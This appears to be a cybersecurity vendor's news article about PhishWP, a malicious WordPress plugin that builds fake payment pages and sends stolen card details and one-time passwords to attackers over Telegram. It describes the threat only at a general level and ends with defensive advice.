HQ/EMEAFind out how we can help your business
The newly discovered PhishWP WordPress plugin could enable cybercriminals to develop bogus payment sites that could impersonate legitimate services. This new plugin may allow malicious individuals to steal financial and personal data.
Reports revealed that the malicious plugin was first discovered on a Russian cybercriminal website. The researchers stated that it lets attackers create convincing payment interfaces that harvest information, such as credit card information, billing addresses, and even one-time passwords.
Once the information is entered, PhishWP immediately exfiltrates the stolen data to the attacker-controlled Telegram account.
Additional investigation also revealed that threat actors use PhishWP to compromise existing WordPress sites or create bogus ones. The plugin’s design closely resembles legitimate payment gateways, making it difficult for consumers to identify the ruse.
PhishWP plugin is a formidable tool that cybercriminals can add to their arsenals.
PhishWP can provide various capabilities that could attract various hackers or cybercriminal groups. It can generate customisable checkout pages that seem like authentic payment processors, harvest OTPs to bypass security prompts and exfiltrate stolen data to an attacker-controlled Telegram account.
When users enable 3DS code requests, the plugin includes a 3DS code popup to ensure that the information is likewise transferred to the threat actor. Researchers noted that data such as the user’s IP address, browser information, and credit card information are transferred along with their credit card information.
To ensure the attackers have enough time to exploit the stolen information, their plugin contains functionality that sends victims a confirmation email containing their order details.
Furthermore, the malware collects browser information, sends fraudulent confirmation emails, supports several languages for global campaigns, and even has obfuscation tools to hide its malicious purposes.
An example of a PhishWP attack is when an attacker creates a fake e-commerce site that contains lures, such as discounted merchandise.
Victims who enter their card information and OTPs on the fraudulent payment page will immediately transfer them to the attacker’s Telegram account. The attackers will then exploit the stolen data to conduct unlawful activities or sell on dark web marketplaces.
The public should adopt powerful browser-based phishing security technologies to counteract this new PhishWP campaign.
